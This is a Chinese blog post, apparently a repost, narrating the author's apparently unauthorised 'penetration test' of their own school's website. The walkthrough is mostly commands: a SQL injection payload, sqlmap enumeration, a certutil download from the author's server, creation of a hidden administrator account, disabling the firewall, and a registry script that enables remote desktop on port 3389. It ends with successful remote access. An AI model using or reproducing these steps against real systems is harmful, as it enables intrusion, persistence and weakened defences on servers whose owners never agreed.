不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

记一次对母校站点的渗透测试

声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。

前言

备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)
测试到注入
http://url/newdetail.aspx?id=11999' or 1=1 --
直接Sqlmap一把过 , 连waf都没得(狗头)
随便看看
python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbspython sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users
DBMS
sqlserver 2005
图片
whoami
在windows中nt authority system 是内置的系统管理账户
图片
查看下目录chdir图片
Dir c:\
图片
OS版本
Microsoft(R) Windows(R) Server 2003, Enterprise Edition
图片
ipconfig
图片
服务器端存在certutil等于是决定测试一下命令
vps
python -m SimpleHTTPServer 80
打一下
ping wt070h.dnslog.cncertutil.exe -urlcache -split -f http://funny_ip/amazing1x
发现回显
图片
奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果
图片
看看环境变量
图片
Nmap看看端口
因为尝试远程连接的时候出了一些问题,起初不知道是什么原因所以打算看看
图片
尝试远程连接3389
新建用户
#新建用户net user amazingadmin123 amazing.123456 /add
#赋予权限net localgroup Administrators amazingadmin123 /add
#激活用户net user amazingadmin123 /active:yes
#关闭防火墙netsh firewall set opmode mode=disable
#开启默认设置 netsh firewall reset
通过注册表开启3389端口
echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "ortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg
相关记录
图片
相关记录
图片
这个过程连续尝试了两三次都没有成功,也没找到原因,服务还关了,只能先考试等管理员开机了
图片
考完试第三天网站上线了,再试试新建用户……
原来是安全策略的问题,不能使用简单地密码,新建用户的时候用了个复杂的密码就行了
远程连接✔️
配置加载中……

点到即止!

源: HACK学习呀

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » 记一次对母校站点的渗透测试

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏